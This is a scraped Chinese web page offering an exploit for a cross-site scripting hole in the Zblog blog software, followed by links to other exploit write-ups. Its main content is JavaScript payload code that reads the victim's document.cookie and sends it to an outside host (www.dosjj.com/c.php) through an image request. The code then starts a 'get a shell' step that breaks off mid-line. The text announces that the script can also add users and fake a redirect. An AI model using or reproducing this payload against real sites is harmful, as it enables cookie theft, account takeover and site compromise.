您现在的位置是:网站首页> 编程资料编程资料
Zblog最新跨站漏洞及利用代码_漏洞分析_网络安全_
2023-05-24
220人已围观
简介 Zblog最新跨站漏洞及利用代码_漏洞分析_网络安全_
Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf(‘password’)==-1?0:1;
tolocation=’https://www.jb51.net/’;
//get cookie
x=new Image();
x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);
//get a shell
data=”txaContent=
相关内容
- 金山毒霸多个sql注入及XSS漏洞和修复_漏洞分析_网络安全_
- AWBS 2.9.2 Blind SQL 注入0day_漏洞分析_网络安全_
- phpcms V9 BLind SQL 注入漏洞0day_漏洞分析_网络安全_
- DedeCmsV5.6 本地包含又一利用方式_漏洞分析_网络安全_
- ckeditor/DesignCms上传漏洞_漏洞分析_网络安全_
- 织梦管理系统后台查找_漏洞分析_网络安全_
- EXCMS 0day (过程精彩)_漏洞分析_网络安全_
- dedecms 5.6的最新注入漏洞_漏洞分析_网络安全_
- dedecms织梦 v5.5 两处跨站漏洞_漏洞分析_网络安全_
- ecshop爆绝对路径的bug_漏洞分析_网络安全_
